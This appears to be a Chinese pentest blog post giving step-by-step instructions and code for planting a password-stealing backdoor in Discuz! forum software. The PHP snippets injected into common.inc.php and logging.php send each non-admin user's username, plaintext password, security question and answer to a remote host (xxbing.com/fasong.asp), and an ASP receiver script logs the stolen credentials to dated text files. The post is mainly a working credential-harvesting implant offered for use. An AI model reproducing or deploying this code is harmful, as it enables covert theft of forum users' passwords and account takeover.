http://www.80pentest.com/?p=835
DZ记录密码,我自己做了份代码。
include/common.inc.php 里面插一个自定义函数。
我选择放在 41-53行。dz7.1-72 include/login.func.php (49-51行) | dz7.0 是在根目录的logging.php
01 |
function request_by_other( $remote_server , $post_string ){ |
02 |
$context = array ( |
03 |
'http' => array ( |
04 |
'method' => 'POST' , |
05 |
'header' => 'Content-type: application/x-www-form-urlencoded' . "/r/n" . |
06 |
'User-Agent : xxbing/'s fuckyou!!!' . "/r/n" . |
07 |
'Content-length: ' . strlen ( $post_string )+8, |
08 |
'content' => 'mypost=' . $post_string ) |
09 |
); |
10 |
$stream_context = stream_context_create( $context ); |
11 |
$data = file_get_contents ( $remote_server ,FALSE, $stream_context ); |
12 |
return $data ; |
13 |
} |
找到根目录下的 logging.php文件。搜索下面代码。
1 |
$ucresult = uc_user_login( $username , $password , $loginfield == 'uid' ); |
然后在后面插上下面的代码:
1 |
if ( $username != 'admin' ){ |
2 |
$showtime = gmdate ( "Ynj H:i:s" ,time()+8*3600); |
3 |
if ( $answer == '' ){ |
4 |
$answer = '无!' ; |
5 |
} |
6 |
//name1无用。但是必须加 |
7 |
$post_string = 'name1=' . $name2 . '&name=' . $username . '&password=' . $password . '&questionid=' . $questionid . '&answer=' . $answer . '&showtime=' . $showtime . '&from=' . $_SERVER [ 'SERVER_NAME' ]; |
8 |
request_by_other( 'http://www.xxbing.com/fasong.asp' , $post_string ); |
9 |
} |
因为我熟悉asp,所以接受端我用asp写的。
asp代码如下:
01 |
<% |
02 |
'接收文件 |
03 |
'body0 = request.form( "name1" ) |
04 |
body1 = request.form( "name" ) |
05 |
body2 = request.form( "password" ) |
06 |
body3 = request.form( "questionid" ) |
07 |
body4 = request.form( "answer" ) |
08 |
body5 = request.form( "showtime" ) |
09 |
body7 = request.form( "from" ) |
10 |
body6 = "账号:" &body1 & "---密码:" & body2 & "---问题ID:" & body3 & "---答案:" & body4 & "---时间:" & body5 & "---来源:" & body7 |
11 |
'response.write body6 |
12 |
FileName = date ()& ".txt" |
13 |
'这里之所以要替换,是为了兼容IIS7的环境。 |
14 |
FileName = Replace(FileName, "/" , "-" ) |
15 |
if body6 <> "" then |
16 |
Call CreateFile(body6,FileName) |
17 |
end if |
18 |
Sub CreateFile(body,FileName) |
19 |
Dim fso, tf ,cf |
20 |
Set fso = CreateObject( "Scripting.FileSystemObject" ) |
21 |
Set tf = fso.openTextFile(server.mappath(FileName),8,True,0) |
22 |
tf.WriteLine body |
23 |
tf.WriteLine "----------------" |
24 |
tf.Close |
25 |
set fso = nothing |
26 |
End Sub |
27 |
%> |